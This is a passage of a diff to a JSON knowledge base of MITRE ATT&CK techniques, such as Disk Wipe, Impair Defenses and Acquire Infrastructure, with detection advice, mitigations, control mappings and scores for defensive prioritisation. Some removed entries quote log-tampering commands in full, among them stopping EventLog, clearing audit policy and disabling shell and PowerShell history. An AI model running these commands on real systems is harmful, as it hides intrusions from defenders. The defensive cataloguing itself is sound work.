-                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                        "url": "https://attack.mitre.org/mitigations/M1047"
-                    }
-                ]
-            },
-            {
-                "tid": "T1560.002",
-                "name": "Archive Collected Data: Archive via Library",
-                "url": "https://attack.mitre.org/techniques/T1560/002",
-                "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.\n\nSome archival libraries are preinstalled on systems, such as bzip2 on macOS and Linux, and zip on Windows. Note that the libraries are different from the utilities. The libraries can be linked against when compiling, while the utilities require spawning a subshell, or a similar execution mechanism.",
-                "detection": "Monitor processes for accesses to known archival libraries. This may yield a significant number of benign events, depending on how systems in the environment are typically used.\n\nConsider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)",
-                "mitigations": []
-            },
-            {
-                "tid": "T1560.003",
-                "name": "Archive Collected Data: Archive via Custom Method",
-                "url": "https://attack.mitre.org/techniques/T1560/003",
-                "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. Custom implementations of well-known compression algorithms have also been used.(Citation: ESET Sednit Part 2)",
-                "detection": "Custom archival methods can be very difficult to detect, since many of them use standard programming language concepts, such as bitwise operations.",
-                "mitigations": []
-            }
+            "Instance: Instance Deletion"
         ],
+        "is_subtechnique": true,
+        "supertechnique": "T1578",
+        "subtechniques": [],
         "mitigations": [
             {
                 "mid": "M1047",
                 "name": "Audit",
                 "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
                 "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
             }
         ],
-        "cumulative_score": 0.6845022647619048,
-        "adjusted_score": 0.6845022647619048,
-        "has_car": true,
-        "has_sigma": true,
+        "cumulative_score": 0.28571428571428575,
+        "adjusted_score": 0.28571428571428575,
+        "has_car": false,
+        "has_sigma": false,
         "has_es_siem": true,
-        "has_splunk": true,
+        "has_splunk": false,
         "cis_controls": [
-            "2.1",
-            "2.2",
-            "2.3",
-            "2.4",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
             "18.3",
             "18.5"
         ],
         "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
             "CA-8",
+            "CM-5",
+            "IA-2",
+            "IA-4",
+            "IA-6",
             "RA-5",
-            "SC-7",
-            "SI-3",
             "SI-4"
         ],
-        "process_coverage": true,
+        "process_coverage": false,
         "network_coverage": false,
-        "file_coverage": true,
-        "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.20476190476190476,
-            "mitigation_score": 0.2,
-            "detection_score": 0.21
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.37974036
+        "file_coverage": false,
+        "cloud_coverage": true,
+        "hardware_coverage": false
     },
     {
-        "tid": "T1561",
-        "name": "Disk Wipe",
-        "description": "Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)",
-        "url": "https://attack.mitre.org/techniques/T1561",
+        "tid": "T1578.004",
+        "name": "Modify Cloud Compute Infrastructure: Revert Cloud Instance",
+        "description": "An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.\n\nAnother variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)",
+        "url": "https://attack.mitre.org/techniques/T1578/004",
         "tactics": [
-            "Impact"
+            "Defense Evasion"
         ],
-        "detection": "Look for attempts to read/write to sensitive locations like the partition boot sector, master boot record, disk partition table, or BIOS parameter block/superblock. Monitor for direct access read/write attempts using the \\\\\\\\.\\\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.",
+        "detection": "Establish centralized logging of instance activity, which can be used to monitor and review system events even after reverting to a snapshot, rolling back changes, or changing persistence/type of storage. Monitor specifically for events related to snapshots and rollbacks and VM configuration changes, that are occurring outside of normal activity. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.",
         "platforms": [
-            "Linux",
-            "Windows",
-            "macOS"
+            "IaaS"
         ],
         "data_sources": [
-            "Command: Command Execution",
-            "Drive: Drive Access",
-            "Drive: Drive Modification",
-            "Driver: Driver Load",
-            "Process: Process Creation"
+            "Instance: Instance Modification",
+            "Instance: Instance Start",
+            "Instance: Instance Stop"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1578",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.10952380952380952,
+        "adjusted_score": 0.10952380952380952,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": true,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1580",
+        "name": "Cloud Infrastructure Discovery",
+        "description": "An adversary may attempt to discover resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.\n\nCloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets API that returns a list of all buckets owned by the authenticated sender of the request, or the GetPublicAccessBlock API to retrieve access block configuration for a bucket (Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block). \nSimilarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list lists details of virtual machines.(Citation: Microsoft AZ CLI)\n\nAn adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.",
+        "url": "https://attack.mitre.org/techniques/T1580",
+        "tactics": [
+            "Discovery"
+        ],
+        "detection": "Establish centralized logging for the activity of cloud infrastructure components. Monitor logs for actions that could be taken to gather information about cloud infrastructure, including the use of discovery API calls by new or unexpected users. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.",
+        "platforms": [
+            "IaaS"
+        ],
+        "data_sources": [
+            "Cloud Storage: Cloud Storage Enumeration",
+            "Cloud Storage: Cloud Storage Metadata",
+            "Instance: Instance Enumeration",
+            "Instance: Instance Metadata",
+            "Snapshot: Snapshot Enumeration",
+            "Snapshot: Snapshot Metadata",
+            "Volume: Volume Enumeration",
+            "Volume: Volume Metadata"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1561.001",
-                "name": "Disk Wipe: Disk Content Wipe",
-                "url": "https://attack.mitre.org/techniques/T1561/001",
-                "description": "Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.\n\nAdversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)",
-                "detection": "Look for attempts to read/write to sensitive locations like the partition boot sector or BIOS parameter block/superblock. Monitor for direct access read/write attempts using the \\\\\\\\.\\\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.",
-                "mitigations": [
-                    {
-                        "mid": "M1053",
-                        "name": "Data Backup",
-                        "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.",
-                        "url": "https://attack.mitre.org/mitigations/M1053"
-                    }
-                ]
-            },
-            {
-                "tid": "T1561.002",
-                "name": "Disk Wipe: Disk Structure Wipe",
-                "url": "https://attack.mitre.org/techniques/T1561/002",
-                "description": "Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources. \n\nAdversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) if all sectors of a disk are wiped.\n\nTo maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)",
-                "detection": "Look for attempts to read/write to sensitive locations like the master boot record and the disk partition table. Monitor for direct access read/write attempts using the \\\\\\\\.\\\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.",
-                "mitigations": [
-                    {
-                        "mid": "M1053",
-                        "name": "Data Backup",
-                        "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.",
-                        "url": "https://attack.mitre.org/mitigations/M1053"
-                    }
-                ]
-            }
-        ],
+        "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1053",
-                "name": "Data Backup",
-                "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.",
-                "url": "https://attack.mitre.org/mitigations/M1053"
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
             }
         ],
-        "cumulative_score": 0.22942312761904762,
-        "adjusted_score": 0.22942312761904762,
+        "cumulative_score": 0.2142857142857143,
+        "adjusted_score": 0.2142857142857143,
         "has_car": false,
-        "has_sigma": true,
+        "has_sigma": false,
         "has_es_siem": false,
         "has_splunk": false,
         "cis_controls": [
-            "11.1",
-            "11.2",
-            "11.3",
-            "11.4",
-            "11.5"
+            "3.3",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8"
         ],
         "nist_controls": [
+            "AC-2",
             "AC-3",
+            "AC-5",
             "AC-6",
-            "CM-2",
-            "CP-10",
-            "CP-2",
-            "CP-7",
-            "CP-9",
-            "SI-3",
-            "SI-4",
-            "SI-7"
+            "IA-2"
         ],
-        "process_coverage": true,
+        "process_coverage": false,
         "network_coverage": false,
         "file_coverage": false,
-        "cloud_coverage": false,
-        "hardware_coverage": true,
+        "cloud_coverage": true,
+        "hardware_coverage": false,
         "actionability_score": {
-            "combined_score": 0.14761904761904762,
-            "mitigation_score": 0.2727272727272727,
-            "detection_score": 0.01
+            "combined_score": 0.11428571428571428,
+            "mitigation_score": 0.21818181818181817
         },
-        "choke_point_score": 0.05,
-        "prevalence_score": 0.03180408
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
-        "tid": "T1562",
-        "name": "Impair Defenses",
-        "description": "Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.\n\nAdversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.",
-        "url": "https://attack.mitre.org/techniques/T1562",
-        "tactics": [
-            "Defense Evasion"
-        ],
-        "detection": "Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools.  Lack of log events may be suspicious.\n\nMonitor environment variables and APIs that can be leveraged to disable security measures.",
-        "platforms": [
-            "Containers",
-            "IaaS",
-            "Linux",
-            "Network",
-            "Office 365",
-            "Windows",
-            "macOS"
+        "tid": "T1583",
+        "name": "Acquire Infrastructure",
+        "description": "Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase.\n\nUse of these infrastructure solutions allows an adversary to stage, launch, and execute an operation. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contact to third-party web services. Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.",
+        "url": "https://attack.mitre.org/techniques/T1583",
+        "tactics": [
+            "Resource Development"
+        ],
+        "detection": "Consider use of services that may aid in tracking of newly acquired infrastructure, such as WHOIS databases for domain registration information. \n\nOnce adversaries have provisioned infrastructure (ex: a server for use in command and control), internet scans may help proactively discover adversary acquired infrastructure. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.",
+        "platforms": [
+            "PRE"
         ],
         "data_sources": [
-            "Cloud Service: Cloud Service Disable",
-            "Cloud Service: Cloud Service Modification",
-            "Command: Command Execution",
-            "Firewall: Firewall Disable",
-            "Firewall: Firewall Rule Modification",
-            "Process: Process Creation",
-            "Process: Process Termination",
-            "Script: Script Execution",
-            "Sensor Health: Host Status",
-            "Service: Service Metadata",
-            "Windows Registry: Windows Registry Key Deletion",
-            "Windows Registry: Windows Registry Key Modification"
+            "Domain Name: Active DNS",
+            "Domain Name: Domain Registration",
+            "Domain Name: Passive DNS",
+            "Internet Scan: Response Content",
+            "Internet Scan: Response Metadata"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
         "subtechniques": [
             {
-                "tid": "T1562.001",
-                "name": "Impair Defenses: Disable or Modify Tools",
-                "url": "https://attack.mitre.org/techniques/T1562/001",
-                "description": "Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take the many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information.\n\nAdversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls)",
-                "detection": "Monitor processes and command-line arguments to see if security tools/services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Monitoring for changes to other known features used by deployed security tools may also expose malicious activity.\n\nLack of expected log events may be suspicious.",
-                "mitigations": [
-                    {
-                        "mid": "M1022",
-                        "name": "Restrict File and Directory Permissions",
-                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1022"
-                    },
-                    {
-                        "mid": "M1024",
-                        "name": "Restrict Registry Permissions",
-                        "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
-                        "url": "https://attack.mitre.org/mitigations/M1024"
-                    },
-                    {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
-                    }
-                ]
-            },
-            {
-                "tid": "T1562.002",
-                "name": "Impair Defenses: Disable Windows Event Logging",
-                "url": "https://attack.mitre.org/techniques/T1562/002",
-                "description": "Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections.\n\nThe EventLog service maintains event logs from various system components and applications.(Citation: EventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to Security Settings\\Local Policies\\Audit Policy for basic audit policy settings or Security Settings\\Advanced Audit Policy Configuration for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation: Advanced_sec_audit_policy_settings) auditpol.exe may also be used to set audit policies.(Citation: auditpol)\n\nAdversaries may target system-wide logging or just that of a particular application. For example, the EventLog service may be disabled using the following PowerShell line: Stop-Service -Name EventLog.(Citation: Disable_Win_Event_Logging) Additionally, adversaries may use auditpol and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the /success or /failure parameters. For example, auditpol /set /category:”Account Logon” /success:disable /failure:disable turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: auditpol /clear /y or auditpol /remove /allusers.(Citation: T1562.002_redcanaryco)\n\nBy disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.",
-                "detection": "Monitor processes and command-line arguments for commands that can be used to disable logging. For example, [Wevtutil](https://attack.mitre.org/software/S0645), `auditpol`, `sc stop EventLog`, and offensive tooling (such as [Mimikatz](https://attack.mitre.org/software/S0002) and `Invoke-Phant0m`) may be used to clear logs.(Citation: def_ev_win_event_logging)(Citation: evt_log_tampering)  \n\nIn Event Viewer, Event ID 1102 under the “Security” Windows Log and Event ID 104 under the “System” Windows Log both indicate logs have been cleared.(Citation: def_ev_win_event_logging) `Service Control Manager Event ID 7035` in Event Viewer may indicate the termination of the EventLog service.(Citation: evt_log_tampering) Additionally, gaps in the logs, e.g. non-sequential Event Record IDs, may indicate that the logs may have been tampered.\n\nMonitor the addition of the MiniNT registry key in `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control`, which may disable Event Viewer.(Citation: def_ev_win_event_logging)",
-                "mitigations": [
-                    {
-                        "mid": "M1047",
-                        "name": "Audit",
-                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                        "url": "https://attack.mitre.org/mitigations/M1047"
-                    },
-                    {
-                        "mid": "M1022",
-                        "name": "Restrict File and Directory Permissions",
-                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1022"
-                    },
-                    {
-                        "mid": "M1024",
-                        "name": "Restrict Registry Permissions",
-                        "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
-                        "url": "https://attack.mitre.org/mitigations/M1024"
-                    },
-                    {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
-                    }
-                ]
-            },
-            {
-                "tid": "T1562.003",
-                "name": "Impair Defenses: Impair Command History Logging",
-                "url": "https://attack.mitre.org/techniques/T1562/003",
-                "description": "Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. \n\nOn Linux and macOS, command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected.\n\nAdversaries may clear the history environment variable (unset HISTFILE) or set the command history size to zero (export HISTFILESIZE=0) to prevent logging of commands. Additionally, HISTCONTROL can be configured to ignore commands that start with a space by simply setting it to \"ignorespace\". HISTCONTROL can also be set to ignore duplicate commands by setting it to \"ignoredups\". In some Linux systems, this is set by default to \"ignoreboth\" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.\n\nOn Windows systems, the PSReadLine module tracks commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt by default). Adversaries may change where these logs are saved using Set-PSReadLineOption -HistorySavePath {File Path}. This will cause ConsoleHost_history.txt to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command Set-PSReadlineOption -HistorySaveStyle SaveNothing.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)",
-                "detection": "Correlating a user session with a distinct lack of new commands in their .bash_history can be a clue to suspicious behavior. Additionally, users checking or changing their HISTCONTROL, HISTFILE, or HISTFILESIZE environment variables may be suspicious.\n\nMonitor for modification of PowerShell command history settings through processes being created with -HistorySaveStyle SaveNothing command-line arguments and use of the PowerShell commands Set-PSReadlineOption -HistorySaveStyle SaveNothing and Set-PSReadLineOption -HistorySavePath {File Path}. ",
+                "tid": "T1583.001",
+                "name": "Acquire Infrastructure: Domains",
+                "url": "https://attack.mitre.org/techniques/T1583/001",
+                "description": "Adversaries may purchase domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.\n\nAdversaries can use purchased domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries can also use internationalized domain names (IDNs) to create visually similar lookalike domains for use in operations.(Citation: CISA IDN ST05-016)\n\nDomain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)",
+                "detection": "Domain registration information is, by design, captured in public registration logs. Consider use of services that may aid in tracking of newly acquired domains, such as WHOIS databases and/or passive DNS. In some cases it may be possible to pivot on known pieces of domain registration information to uncover other infrastructure purchased by the adversary. Consider monitoring for domains created with a similar structure to your own, including under a different TLD. Though various tools and services exist to track, query, and monitor domain name registration information, tracking across multiple DNS infrastructures can require multiple tools/services or more advanced analytics.(Citation: ThreatConnect Infrastructure Dec 2020)\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control.",
                 "mitigations": [
                     {
-                        "mid": "M1039",
-                        "name": "Environment Variable Permissions",
-                        "description": "Prevent modification of environment variables by unauthorized users and groups.",
-                        "url": "https://attack.mitre.org/mitigations/M1039"
-                    },
-                    {
-                        "mid": "M1028",
-                        "name": "Operating System Configuration",
-                        "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1028"
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
                     }
                 ]
             },
             {
-                "tid": "T1562.004",
-                "name": "Impair Defenses: Disable or Modify System Firewall",
-                "url": "https://attack.mitre.org/techniques/T1562/004",
-                "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.\n\nModifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. ",
-                "detection": "Monitor processes and command-line arguments to see if firewalls are disabled or modified. Monitor Registry edits to keys that manage firewalls.",
+                "tid": "T1583.002",
+                "name": "Acquire Infrastructure: DNS Server",
+                "url": "https://attack.mitre.org/techniques/T1583/002",
+                "description": "Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.\n\nBy running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic ([DNS](https://attack.mitre.org/techniques/T1071/004)). With control over a DNS server, adversaries can configure DNS applications to provide conditional responses to malware and, generally, have more flexibility in the structure of the DNS-based C2 channel.(Citation: Unit42 DNS Mar 2019)",
+                "detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.",
                 "mitigations": [
                     {
-                        "mid": "M1022",
-                        "name": "Restrict File and Directory Permissions",
-                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1022"
-                    },
-                    {
-                        "mid": "M1024",
-                        "name": "Restrict Registry Permissions",
-                        "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
-                        "url": "https://attack.mitre.org/mitigations/M1024"
-                    },
-                    {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
                     }
                 ]
             },
             {
-                "tid": "T1562.006",
-                "name": "Impair Defenses: Indicator Blocking",
-                "url": "https://attack.mitre.org/techniques/T1562/006",
